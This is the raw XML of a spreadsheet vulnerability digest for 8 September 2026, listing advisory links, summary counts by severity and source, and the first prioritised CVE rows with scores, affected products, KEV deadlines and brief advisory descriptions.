/><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62385" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77634" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79676" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80206" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-qp76-pq9f-gr9m" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84361" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-298h-jpq4-m665" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-7jx3-jqcp-hhgc" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-6rj2-96f5-chj9" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-89ff-m8wv-p99r" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-w672-239g-c3gr" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67321" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69112" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75596" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83611" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85062" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85063" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-3mcp-22mf-vrw3" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-mxjf-vfmv-qfm6" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62383" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76845" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-486p-g8x4-77mg" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45819" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81725" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84303" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84376" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71493" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71494" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12208" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86996" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73087" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8769" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-59057" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12259" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15603" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19693" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21884" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33244" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37004" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41855" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49114" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50646" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53668" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62900" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65915" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67322" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67323" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67325" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68584" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69222" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72789" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72790" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72925" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73262" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73294" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73558" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73560" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73843" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75604" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76217" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76218" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76219" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76220" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76222" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77037" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77063" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77078" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78678" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78679" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82333" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84308" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84363" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84364" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84365" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84367" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84368" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84369" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84370" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84372" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84373" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84374" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84375" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84378" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84379" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84380" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84381" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84382" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84445" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85061" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-26w7-cxv4-gfx2" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-2q33-cf8w-7q23" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-2q42-4q24-7rgv" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-2x7j-588g-ccc2" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16045" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16042" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-4qhr-qf46-fcrx" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-57v5-wqx3-cgj4" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-8m3c-c648-2xjj" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16047" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16046" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-cc9r-2j5m-2m83" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-cvhv-g4rq-3hmw" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16043" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-mqvm-gmc4-6rv2" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-q72m-f2r4-w4cw" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-v3f6-m9j2-437p" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-wmmp-3585-3rmp" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16048" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16049" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16050" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16051" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16052" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16056" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16057" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16058" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16199" TargetMode="External" Id="rId164"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2026-09-08</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="2" t="inlineStr">
        <is>
          <t>Window (UTC)</t>
        </is>
      </c>
      <c r="B3" s="3" t="inlineStr">
        <is>
          <t>2026-09-08T00:00 to 2026-09-09T00:00</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="2" t="inlineStr">
        <is>
          <t>Generated</t>
        </is>
      </c>
      <c r="B4" s="3" t="inlineStr">
        <is>
          <t>2026-09-17 09:49:10 UTC</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="2" t="inlineStr"/>
      <c r="B5" s="3" t="inlineStr"/>
    </row>
    <row r="6">
      <c r="A6" s="2" t="inlineStr">
        <is>
          <t>Total entries</t>
        </is>
      </c>
      <c r="B6" s="3" t="n">
        <v>2446</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="2" t="inlineStr">
        <is>
          <t xml:space="preserve">  Newly published</t>
        </is>
      </c>
      <c r="B7" s="3" t="n">
        <v>1585</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="2" t="inlineStr">
        <is>
          <t xml:space="preserve">  Updated (recently published, now scored / KEV)</t>
        </is>
      </c>
      <c r="B8" s="3" t="n">
        <v>861</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="2" t="inlineStr">
        <is>
          <t>In CISA KEV (actively exploited)</t>
        </is>
      </c>
      <c r="B9" s="3" t="n">
        <v>19</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="2" t="inlineStr">
        <is>
          <t>Critical</t>
        </is>
      </c>
      <c r="B10" s="3" t="n">
        <v>207</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="2" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="B11" s="3" t="n">
        <v>1280</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="2" t="inlineStr">
        <is>
          <t>Medium</t>
        </is>
      </c>
      <c r="B12" s="3" t="n">
        <v>801</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="2" t="inlineStr">
        <is>
          <t>Low</t>
        </is>
      </c>
      <c r="B13" s="3" t="n">
        <v>72</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="2" t="inlineStr">
        <is>
          <t>Unscored (awaiting NVD analysis)</t>
        </is>
      </c>
      <c r="B14" s="3" t="n">
        <v>109</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="2" t="inlineStr">
        <is>
          <t>Watchlist matches</t>
        </is>
      </c>
      <c r="B15" s="3" t="n">
        <v>488</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="2" t="inlineStr">
        <is>
          <t>From GitHub Advisories</t>
        </is>
      </c>
      <c r="B16" s="3" t="n">
        <v>150</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="2" t="inlineStr">
        <is>
          <t>From OSV.dev</t>
        </is>
      </c>
      <c r="B17" s="3" t="n">
        <v>108</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worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"><sheetPr><outlinePr summaryBelow="1" summaryRight="1" /><pageSetUpPr /></sheetPr><dimension ref="A1:S2447"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KEV Due</t></is></c><c r="Q1" s="4" t="inlineStr"><is><t>CWE</t></is></c><c r="R1" s="4" t="inlineStr"><is><t>Description</t></is></c><c r="S1" s="4" t="inlineStr"><is><t>Link</t></is></c></row><row r="2"><c r="A2" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B2" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2" s="5" t="inlineStr"><is><t>CVE-2026-84869</t></is></c><c r="D2" s="5" t="n"><v>9.9</v></c><c r="E2" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F2" s="5" t="inlineStr"><is><t>7d616e1a-3288-43b1-a0dd-0a65d3e70a49</t></is></c><c r="G2" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H2" s="5" t="n"><v>0.007</v></c><c r="I2" s="5" t="inlineStr" /><c r="J2" s="5" t="inlineStr" /><c r="K2" s="5" t="inlineStr"><is><t>connectwise:screenconnect</t></is></c><c r="L2" s="5" t="inlineStr" /><c r="M2" s="5" t="inlineStr" /><c r="N2" s="5" t="inlineStr"><is><t>KEV, NVD</t></is></c><c r="O2" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q2" s="5" t="inlineStr"><is><t>CWE-269, CWE-862</t></is></c><c r="R2" s="5" t="inlineStr"><is><t>A condition in the ScreenConnect client may allow files to be transferred and executed through an active remote session without authorization or Host confirmation in certain circumstances. ScreenConnect servers are not impacted.</t></is></c><c r="S2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84869</t></is></c></row><row r="3"><c r="A3" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B3" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C3" s="5" t="inlineStr"><is><t>CVE-2026-58704</t></is></c><c r="D3" s="5" t="n"><v>8.800000000000001</v></c><c r="E3" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F3" s="5" t="inlineStr"><is><t>CISA-ADP</t></is></c><c r="G3" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H3" s="5" t="n"><v>0.001</v></c><c r="I3" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J3" s="5" t="inlineStr" /><c r="K3" s="5" t="inlineStr"><is><t>google:pixel</t></is></c><c r="L3" s="5" t="inlineStr" /><c r="M3" s="5" t="inlineStr" /><c r="N3" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O3" s="5" t="inlineStr" /><c r="P3" s="5" t="inlineStr"><is><t>2026-09-19</t></is></c><c r="Q3" s="5" t="inlineStr"><is><t>CWE-285, CWE-693</t></is></c><c r="R3" s="5" t="inlineStr"><is><t>Google Pixel devices contain an improper authorization vulnerability in the cellular modem. A logic error may allow an attacker to bypass permission checks and escalate privileges.</t></is></c><c r="S3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58704</t></is></c></row><row r="4"><c r="A4" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B4" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C4" s="5" t="inlineStr"><is><t>CVE-2026-85046</t></is></c><c r="D4" s="5" t="n"><v>8.800000000000001</v></c><c r="E4" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F4" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G4" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H4" s="5" t="n"><v>0.015</v></c><c r="I4" s="5" t="inlineStr" /><c r="J4" s="5" t="inlineStr" /><c r="K4" s="5" t="inlineStr"><is><t>google:chrome, google:v8</t></is></c><c r="L4" s="5" t="inlineStr" /><c r="M4" s="5" t="inlineStr" /><c r="N4" s="5" t="inlineStr"><is><t>KEV, NVD</t></is></c><c r="O4" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P4" s="5" t="inlineStr"><is><t>2026-09-18</t></is></c><c r="Q4" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="R4" s="5" t="inlineStr"><is><t>Type confusion in V8 in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t></is></c><c r="S4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85046</t></is></c></row><row r="5"><c r="A5" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B5" s="5" t="inlineStr"><is><t>Added to KEV</t></is></c><c r="C5" s="5" t="inlineStr"><is><t>CVE-2026-87491</t></is></c><c r="D5" s="5" t="n"><v>8.800000000000001</v></c><c r="E5" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F5" s="5" t="inlineStr"><is><t>CISA-ADP</t></is></c><c r="G5" s="5" t="inlineStr"><is><t>Yes</t></is></c><c r="H5" s="5" t="n"><v>0.01</v></c><c r="I5" s="5" t="inlineStr"><is><t>active</t></is></c><c r="J5" s="5" t="inlineStr" /><c r="K5" s="5" t="inlineStr"><is><t>google:chromium v8</t></is></c><c r="L5" s="5" t="inlineStr" /><c r="M5" s="5" t="inlineStr" /><c r="N5" s="5" t="inlineStr"><is><t>KEV, Vulnrichment</t></is></c><c r="O5" s="5" t="inlineStr" /><c r="P5" s="5" t="inlineStr"><is><t>2026-09-23</t></is></c><c r="Q5" s="5" t="inlineStr" /><c r="R5" s="5" t="inlineStr"><is><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is></c><c r="S5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-87491</t></is></c></row><row r="6"><c r="A6" s="5" t="inlineStr"><is><t>P1 - Act now</t></is></c><c r="B6" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C6" s="5" t="inlineStr"><is><t>CVE-2026-81963</t></is></c><c r="D6" s="5" t="n"><v>7.8</v></c><c r="E6" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F6" s="5" 